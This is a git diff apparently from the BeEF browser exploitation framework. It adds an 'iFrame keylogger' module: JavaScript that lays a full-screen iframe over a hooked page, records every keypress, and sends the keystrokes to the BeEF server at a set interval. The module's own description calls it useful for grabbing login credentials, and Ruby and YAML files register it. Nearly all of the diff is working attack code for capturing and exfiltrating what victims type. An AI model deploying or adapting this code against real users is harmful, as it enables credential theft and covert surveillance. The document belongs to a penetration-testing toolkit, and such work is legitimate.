diff --git a/extensions/demos/html/secret_page.html b/extensions/demos/html/secret_page.html index cf295841d..2fa35f875 100644 --- a/extensions/demos/html/secret_page.html +++ b/extensions/demos/html/secret_page.html @@ -9,5 +9,7 @@ This page is not hooked by beef. However you should still be capable of accessing it using the Requester.

+   

+ \ No newline at end of file diff --git a/modules/persistence/iframe_keylogger/command.js b/modules/persistence/iframe_keylogger/command.js new file mode 100644 index 000000000..c9ce7d3d0 --- /dev/null +++ b/modules/persistence/iframe_keylogger/command.js @@ -0,0 +1,70 @@ +// +// Copyright 2011 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + + // logged keystrokes array + var stream = new Array(); + + // add the pressed key to the keystroke stream array + function keyPressHandler(evt) { + evt = evt || window.event; + if (evt) { + var keyCode = evt.charCode || evt.keyCode; + charLogged = String.fromCharCode(keyCode); + stream.push(charLogged); + } + } + + // creates the overlay 100% width/height iFrame + overlay = beef.dom.createIframe('fullscreen', 'get', {'src':"<%= @iFrameSrc %>", 'id':"overlayiframe", 'name':"overlayiframe"}, {}, null); + + if(beef.browser.isIE()){ + // listen for keypress events on the iFrame + function setKeypressHandler(windowOrFrame, keyHandler) { + var doc = windowOrFrame.document; + if (doc) { + if (doc.attachEvent) { + doc.attachEvent( + 'onkeypress', + function () { + keyHandler(windowOrFrame.event); + } + ); + } + else { + doc.onkeypress = keyHandler; + } + } + } + + setKeypressHandler(window.frames.overlayiframe, keyPressHandler); + + }else{ + document.getElementById('overlayiframe').contentWindow.addEventListener('keypress', keyPressHandler, true); + } + + // every N seconds send the keystrokes back to BeEF + setInterval(function queue() { + var keystrokes = ""; + if (stream.length > 0) { + for (var i = 0; i < stream.length; i++) { + keystrokes += stream[i] + ""; + } + beef.net.send("<%= @command_url %>", <%= @command_id %>, "keystrokes=" + keystrokes); + stream = new Array(); + } + }, <%= @sendBackInterval %>) +}); diff --git a/modules/persistence/iframe_keylogger/config.yaml b/modules/persistence/iframe_keylogger/config.yaml new file mode 100644 index 000000000..d8d4c9282 --- /dev/null +++ b/modules/persistence/iframe_keylogger/config.yaml @@ -0,0 +1,26 @@ +# +# Copyright 2011 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + iframe_keylogger: + enable: true + category: "Persistence" + name: "iFrame keylogger" + description: "Creates a 100% by 100% iFrame overlay displaying the choosen resource, and add JS keylogging capabilities on that iFrame. Useful to grab same-domain login page credentials." + authors: ["antisnatchor"] + target: + working: [IE, FF, S, C] + not_working: [O] diff --git a/modules/persistence/iframe_keylogger/module.rb b/modules/persistence/iframe_keylogger/module.rb new file mode 100644 index 000000000..abcbec0dc --- /dev/null +++ b/modules/persistence/iframe_keylogger/module.rb @@ -0,0 +1,54 @@ +# +# Copyright 2011 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Iframe_keylogger < BeEF::Core::Command + + # + # Defines and set up the command module. + # + def initialize + super({ + 'Name' => 'iFrame keylogger', + 'Description' => 'Creates a 100% by 100% iFrame overlay displaying the choosen resource, and add JS keylogging capabilities on that iFrame. Useful to grab same-domain login page credentials.', + 'Category' => 'Misc', + 'Author' => 'antisnatchor', + 'Data' => [ + {'name' => 'iFrameSrc', 'ui_label'=>'iFrame Src', 'type' => 'textarea', 'value' =>'/demos/secret_page.html', 'width' => '400px', 'height' => '50px'}, + {'name' => 'sendBackInterval', 'ui_label' => 'Send Back Interval (ms)', 'value' => '2000', 'width'=>'100px' } + + ], + 'File' => __FILE__ + }) + + # works in every latest browser (IE8, Firefox 5, Chrome 12, Safari 5) except Opera + set_target({ + 'verified_status' => VERIFIED_WORKING, + 'browser_name' => ALL + }) + set_target({ + 'verified_status' => VERIFIED_NOT_WORKING, + 'browser_name' => O + }) + + use_template! + end + + def callback + content = {} + content['keystrokes'] = @datastore['keystrokes'] + save content + end + +end \ No newline at end of file